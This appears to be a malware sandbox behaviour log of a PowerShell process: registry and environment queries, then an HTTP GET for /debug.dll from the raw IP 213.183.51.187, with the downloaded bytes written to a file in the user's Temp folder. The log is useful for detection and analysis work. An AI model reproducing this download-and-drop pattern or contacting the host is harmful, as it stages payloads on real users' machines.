| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\HardwareEvents\PowerShell |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Internet Explorer |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Internet Explorer\PowerShell |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Key Management Service |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Key Management Service\PowerShell |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Media Center |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Media Center\PowerShell |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\OAlerts |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\OAlerts\PowerShell |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Security |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\System |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\System\PowerShell |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Windows PowerShell |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Windows PowerShell\PowerShell |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog |
|
1 | |
| Registry | Get Key Info | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Application |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Application\PowerShell |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\HardwareEvents |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\HardwareEvents\PowerShell |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Internet Explorer |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Internet Explorer\PowerShell |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Key Management Service |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Key Management Service\PowerShell |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Media Center |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Media Center\PowerShell |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\OAlerts |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\OAlerts\PowerShell |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Security |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\System |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\System\PowerShell |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Windows PowerShell |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Windows PowerShell\PowerShell |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog |
|
1 | |
| Registry | Get Key Info | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Application |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Application\PowerShell |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\HardwareEvents |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\HardwareEvents\PowerShell |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Internet Explorer |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Internet Explorer\PowerShell |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Key Management Service |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Key Management Service\PowerShell |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Media Center |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Media Center\PowerShell |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\OAlerts |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\OAlerts\PowerShell |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Security |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\System |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\System\PowerShell |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Windows PowerShell |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Windows PowerShell\PowerShell |
|
1 | |
| Environment | Get Environment String | name = MshEnableTrace |
|
1 | |
| Environment | Get Environment String | name = MshEnableTrace |
|
1 | |
| Environment | Get Environment String | name = MshEnableTrace |
|
1 | |
| Environment | Get Environment String | name = HOMEDRIVE, result_out = C: |
|
1 | |
| Environment | Get Environment String | name = HOMEPATH, result_out = \Users\BGC6u8Oy yXGxkR |
|
1 | |
| File | Get Info | filename = C:\Users\BGC6u8Oy yXGxkR, type = file_attributes |
|
1 | |
| File | Get Info | filename = C:\, type = file_attributes |
|
4 | |
| Environment | Get Environment String | name = MshEnableTrace |
|
1 | |
| Environment | Get Environment String | name = MshEnableTrace |
|
1 | |
| Environment | Get Environment String | name = MshEnableTrace |
|
2 | |
| Environment | Get Environment String | name = MshEnableTrace |
|
5 | |
| File | Get Info | filename = C:\Users\BGC6u8Oy yXGxkR\Desktop, type = file_attributes |
|
2 | |
| Environment | Get Environment String | name = MshEnableTrace |
|
1 | |
| File | Get Info | filename = C:\, type = file_attributes |
|
2 | |
| File | Get Info | filename = C:\Users, type = file_attributes |
|
2 | |
| File | Get Info | filename = C:\Users\BGC6u8Oy yXGxkR, type = file_attributes |
|
2 | |
| File | Get Info | filename = C:\Users\BGC6u8Oy yXGxkR\Desktop, type = file_attributes |
|
2 | |
| File | Get Info | filename = C:\Users, type = file_attributes |
|
2 | |
| File | Get Info | filename = C:\Users\BGC6u8Oy yXGxkR, type = file_attributes |
|
2 | |
| File | Get Info | filename = C:\Users\BGC6u8Oy yXGxkR\Desktop, type = file_attributes |
|
3 | |
| Environment | Get Environment String | name = MshEnableTrace |
|
2 | |
| Environment | Get Environment String | name = HomeDrive, result_out = C: |
|
1 | |
| Environment | Get Environment String | name = HomePath, result_out = \Users\BGC6u8Oy yXGxkR |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine, value_name = ApplicationBase, data = 0, type = REG_SZ |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine, value_name = ApplicationBase, data = C:\Windows\System32\WindowsPowerShell\v1.0, type = REG_SZ |
|
1 | |
| Environment | Get Environment String | name = MshEnableTrace |
|
11 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine, value_name = ApplicationBase, data = 0, type = REG_SZ |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine, value_name = ApplicationBase, data = C:\Windows\System32\WindowsPowerShell\v1.0, type = REG_SZ |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine, value_name = ApplicationBase, data = 0, type = REG_SZ |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine, value_name = ApplicationBase, data = C:\Windows\System32\WindowsPowerShell\v1.0, type = REG_SZ |
|
1 | |
| Environment | Get Environment String | name = MshEnableTrace |
|
7 | |
| File | Open | filename = STD_INPUT_HANDLE |
|
1 | |
| Environment | Get Environment String | name = MshEnableTrace |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\PowerShell\1\ShellIds |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\PowerShell\1\ShellIds, value_name = PipelineMaxStackSizeMB, type = REG_NONE |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\PowerShell\1\ShellIds |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\PowerShell\1\ShellIds, value_name = PipelineMaxStackSizeMB, type = REG_NONE |
|
1 | |
| File | Create | filename = CONOUT$, desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE |
|
1 | |
| File | Write | filename = CONOUT$, size = 37 |
|
1 | |
| File | Create | filename = CONOUT$, desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE |
|
1 | |
| File | Create | filename = CONOUT$, desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE |
|
1 | |
| File | Create | filename = CONOUT$, desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE |
|
1 | |
| File | Create | filename = CONIN$, desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_READ |
|
1 | |
| File | Read | filename = CONIN$, size = 8192 |
|
1 |
| Category | Operation | Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Environment | Get Environment String | name = MshEnableTrace |
|
22 | |
| Module | Get Filename | process_name = c:\windows\system32\windowspowershell\v1.0\powershell.exe, file_name_orig = C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, size = 260 |
|
1 | |
| File | Get Info | filename = C:\Windows\Microsoft.NET\Framework\v2.0.50727\Config\machine.config, type = file_attributes |
|
2 | |
| File | Create | filename = C:\Windows\Microsoft.NET\Framework\v2.0.50727\Config\machine.config, desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ |
|
1 | |
| File | Get Info | filename = C:\Windows\Microsoft.NET\Framework\v2.0.50727\Config\machine.config, type = file_type |
|
2 | |
| File | Get Info | filename = C:\Windows\Microsoft.NET\Framework\v2.0.50727\Config\machine.config, type = size, size_out = 0 |
|
1 | |
| File | Read | filename = C:\Windows\Microsoft.NET\Framework\v2.0.50727\Config\machine.config, size = 4096, size_out = 4096 |
|
6 | |
| File | Read | filename = C:\Windows\Microsoft.NET\Framework\v2.0.50727\Config\machine.config, size = 4096, size_out = 1459 |
|
1 | |
| File | Read | filename = C:\Windows\Microsoft.NET\Framework\v2.0.50727\Config\machine.config, size = 4096, size_out = 0 |
|
1 | |
| Module | Get Filename | process_name = c:\windows\system32\windowspowershell\v1.0\powershell.exe, file_name_orig = C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, size = 260 |
|
1 | |
| File | Get Info | filename = C:\Windows\System32\WindowsPowerShell\v1.0\powershell.config, type = file_attributes |
|
2 | |
| File | Create | filename = C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Tempdebug.dll, desired_access = GENERIC_WRITE, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ |
|
1 | |
| File | Get Info | filename = C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Tempdebug.dll, type = file_type |
|
2 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion, value_name = InstallationType, data = 0, type = REG_SZ |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion, value_name = InstallationType, data = Client, type = REG_SZ |
|
1 | |
| Socket | Create | protocol = IPPROTO_IP, address_family = AF_INET, type = SOCK_DGRAM |
|
1 | |
| Socket | Close | type = SOCK_DGRAM |
|
1 | |
| Socket | Create | protocol = IPPROTO_IP, address_family = AF_INET6, type = SOCK_DGRAM |
|
1 | |
| Socket | Close | type = SOCK_DGRAM |
|
1 | |
| System | Get Computer Name | result_out = F71GWAT |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\.NET CLR Networking\Performance |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\.NET CLR Networking\Performance, value_name = Library, data = 0, type = REG_SZ |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\.NET CLR Networking\Performance, value_name = Library, data = netfxperf.dll, type = REG_SZ |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\.NET CLR Networking\Performance, value_name = IsMultiInstance, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\.NET CLR Networking\Performance, value_name = IsMultiInstance, data = 1, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\.NET CLR Networking\Performance, value_name = First Counter, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\.NET CLR Networking\Performance, value_name = First Counter, data = 4160, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\.net clr networking\Performance |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\.net clr networking\Performance, value_name = CategoryOptions, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\.net clr networking\Performance, value_name = CategoryOptions, data = 3, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\.net clr networking\Performance, value_name = FileMappingSize, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\.net clr networking\Performance, value_name = FileMappingSize, data = 131072, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\.net clr networking\Performance, value_name = Counter Names, type = REG_BINARY |
|
2 | |
| Module | Create Mapping | filename = System Paging File, protection = PAGE_READWRITE, maximum_size = 131072 |
|
1 | |
| Module | Map | process_name = c:\windows\system32\windowspowershell\v1.0\powershell.exe, desired_access = FILE_MAP_WRITE |
|
1 | |
| System | Get Info | type = Operating System |
|
2 | |
| Mutex | Create | mutex_name = Global\.net clr networking |
|
1 | |
| Mutex | Create | mutex_name = Global\.net clr networking |
|
1 | |
| Mutex | Open | mutex_name = Global\.net clr networking, desired_access = MUTEX_MODIFY_STATE, SYNCHRONIZE |
|
1 | |
| Mutex | Release | mutex_name = Global\.net clr networking |
|
1 | |
| Mutex | Release | mutex_name = Global\.net clr networking |
|
1 | |
| Mutex | Create | mutex_name = Global\.net clr networking |
|
1 | |
| Mutex | Release | mutex_name = Global\.net clr networking |
|
1 | |
| Mutex | Create | mutex_name = Global\.net clr networking |
|
1 | |
| Mutex | Release | mutex_name = Global\.net clr networking |
|
1 | |
| Mutex | Create | mutex_name = Global\.net clr networking |
|
1 | |
| Mutex | Release | mutex_name = Global\.net clr networking |
|
1 | |
| Mutex | Create | mutex_name = Global\.net clr networking |
|
1 | |
| Mutex | Release | mutex_name = Global\.net clr networking |
|
1 | |
| Mutex | Create | mutex_name = Global\.net clr networking |
|
1 | |
| Mutex | Release | mutex_name = Global\.net clr networking |
|
1 | |
| Mutex | Create | mutex_name = Global\.net clr networking |
|
1 | |
| Mutex | Release | mutex_name = Global\.net clr networking |
|
1 | |
| Mutex | Create | mutex_name = Global\.net clr networking |
|
1 | |
| Mutex | Release | mutex_name = Global\.net clr networking |
|
1 | |
| Mutex | Create | mutex_name = Global\.net clr networking |
|
1 | |
| Mutex | Release | mutex_name = Global\.net clr networking |
|
1 | |
| Mutex | Create | mutex_name = Global\.net clr networking |
|
1 | |
| Mutex | Release | mutex_name = Global\.net clr networking |
|
1 | |
| Socket | Create | protocol = IPPROTO_IP, address_family = AF_INET, type = SOCK_DGRAM |
|
1 | |
| Socket | Create | protocol = IPPROTO_IP, address_family = AF_INET6, type = SOCK_DGRAM |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\CurrentVersion\Internet Settings |
|
1 | |
| Socket | Create | protocol = IPPROTO_IP, address_family = AF_INET, type = SOCK_DGRAM |
|
1 | |
| Socket | Create | protocol = IPPROTO_IP, address_family = AF_INET6, type = SOCK_DGRAM |
|
1 | |
| Socket | Create | protocol = IPPROTO_TCP, address_family = AF_INET, type = SOCK_STREAM |
|
1 | |
| Socket | Create | protocol = IPPROTO_TCP, address_family = AF_INET6, type = SOCK_STREAM |
|
1 | |
| Socket | Connect | remote_address = 213.183.51.187, remote_port = 80 |
|
1 | |
| Socket | Close | type = SOCK_STREAM |
|
1 | |
| Socket | Send | flags = NO_FLAG_SET, size = 73, size_out = 73 |
|
1 | |
| Inet | Open Session | access_type = WINHTTP_ACCESS_TYPE_NO_PROXY, proxy_name = WINHTTP_NO_PROXY_NAME, proxy_bypass = WINHTTP_NO_PROXY_BYPASS |
|
1 | |
| Inet | Open Connection | protocol = http, server_name = 213.183.51.187, server_port = 80 |
|
1 | |
| Inet | Open HTTP Request | http_verb = GET, http_version = HTTP/1.1, target_resource = /debug.dll |
|
1 | |
| Inet | Send HTTP Request | headers = host: 213.183.51.187, connection: Keep-Alive, url = 213.183.51.187/debug.dll |
|
1 | |
| Socket | Receive | flags = NO_FLAG_SET, size = 4096, size_out = 4096 |
|
1 | |
| Inet | Read Response | size = 4096, size_out = 4096 |
|
1 | |
| Socket | Receive | flags = NO_FLAG_SET, size = 65536, size_out = 1712 |
|
1 | |
| Inet | Read Response | size = 65536, size_out = 1712 |
|
1 | |
| File | Write | filename = C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Tempdebug.dll, size = 4096 |
|
1 | |
| Socket | Receive | flags = NO_FLAG_SET, size = 65536, size_out = 65536 |
|
1 | |
| Inet | Read Response | size = 65536, size_out = 65536 |
|
1 | |
| File | Write | filename = C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Tempdebug.dll, size = 4096 |
|
1 | |
| File | Write | filename = C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Tempdebug.dll, size = 62910 |
|
1 | |
| Socket | Receive | flags = NO_FLAG_SET, size = 65536, size_out = 8516 |
|
1 | |
| Inet | Read Response | size = 65536, size_out = 8516 |
|
1 | |
| File | Write | filename = C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Tempdebug.dll, size = 8516 |
|
1 | |
| Socket | Receive | flags = NO_FLAG_SET, size = 65536, size_out = 7260 |
|
1 | |
| Inet | Read Response | size = 65536, size_out = 7260 |
|
1 | |
| File | Write | filename = C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Tempdebug.dll, size = 7260 |
|
1 | |
| Socket | Receive | flags = NO_FLAG_SET, size = 65536, size_out = 49368 |
|
1 | |
| Inet | Read Response | size = 65536, size_out = 49368 |
|
1 | |
| File | Write | filename = C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Tempdebug.dll, size = 49368 |
|
1 | |
| Socket | Receive | flags = NO_FLAG_SET, size = 65536, size_out = 8712 |
|
1 | |
| Inet | Read Response | size = 65536, size_out = 8712 |
|
1 | |
| File | Write | filename = C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Tempdebug.dll, size = 8712 |
|
1 | |
| Socket | Receive | flags = NO_FLAG_SET, size = 65536, size_out = 3752 |
|
1 | |
| Inet | Read Response | size = 65536, size_out = 3752 |
|
1 | |
| Socket | Receive | flags = NO_FLAG_SET, size = 65536, size_out = 6412 |
|
1 | |
| Inet | Read Response | size = 65536, size_out = 6412 |
|
1 | |
| File | Write | filename = C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Tempdebug.dll, size = 4096 |
|
1 | |
| File | Write | filename = C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Tempdebug.dll, size = 6068 |
|
1 | |
| Socket | Receive | flags = NO_FLAG_SET, size = 65536, size_out = 2904 |
|
1 | |
| Inet | Read Response | size = 65536, size_out = 2904 |
|
1 | |
| Socket | Receive | flags = NO_FLAG_SET, size = 65536, size_out = 65536 |
|
1 | |
| Inet | Read Response | size = 65536, size_out = 65536 |
|
1 | |
| File | Write | filename = C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Tempdebug.dll, size = 4096 |
|
1 | |
| File | Write | filename = C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Tempdebug.dll, size = 64344 |
|
1 | |
| Socket | Receive | flags = NO_FLAG_SET, size = 65536, size_out = 7064 |
|
1 | |
| Inet | Read Response | size = 65536, size_out = 7064 |
|
1 | |
| File | Write | filename = C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Tempdebug.dll, size = 7064 |
|
1 | |
| Socket | Receive | flags = NO_FLAG_SET, size = 65536, size_out = 2904 |
|
1 | |
| Inet | Read Response | size = 65536, size_out = 2904 |
|
1 | |
| Socket | Receive | flags = NO_FLAG_SET, size = 65536, size_out = 1452 |
|
1 | |
| Inet | Read Response | size = 65536, size_out = 1452 |
|
1 | |
| File | Write | filename = C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Tempdebug.dll, size = 4096 |
|
1 | |
| Socket | Receive | flags = NO_FLAG_SET, size = 65536, size_out = 5808 |
|
1 | |
| Inet | Read Response | size = 65536, size_out = 5808 |
|
1 | |
| File | Write | filename = C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Tempdebug.dll, size = 4096 |
|
1 | |
| Socket | Receive | flags = NO_FLAG_SET, size = 65536, size_out = 21780 |
|
1 | |
| Inet | Read Response | size = 65536, size_out = 21780 |
|
1 | |
| File | Write | filename = C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Tempdebug.dll, size = 4096 |
|
1 | |
| File | Write | filename = C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Tempdebug.dll, size = 19656 |
|
1 | |
| Socket | Receive | flags = NO_FLAG_SET, size = 65536, size_out = 5808 |
|
1 | |
| Inet | Read Response | size = 65536, size_out = 5808 |
|
1 | |
| File | Write | filename = C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Tempdebug.dll, size = 5808 |
|
1 | |
| Socket | Receive | flags = NO_FLAG_SET, size = 65536, size_out = 65536 |
|
1 | |
| Inet | Read Response | size = 65536, size_out = 65536 |
|
1 | |
| File | Write | filename = C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Tempdebug.dll, size = 65536 |
|
1 | |
| Socket | Receive | flags = NO_FLAG_SET, size = 65536, size_out = 12872 |
|
1 | |
| Inet | Read Response | size = 65536, size_out = 12872 |
|
1 | |
| File | Write | filename = C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Tempdebug.dll, size = 12872 |
|
1 | |
| Socket | Receive | flags = NO_FLAG_SET, size = 65536, size_out = 46188 |
|
1 | |
| Inet | Read Response | size = 65536, size_out = 46188 |
|
1 | |
| File | Write | filename = C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Tempdebug.dll, size = 46188 |
|
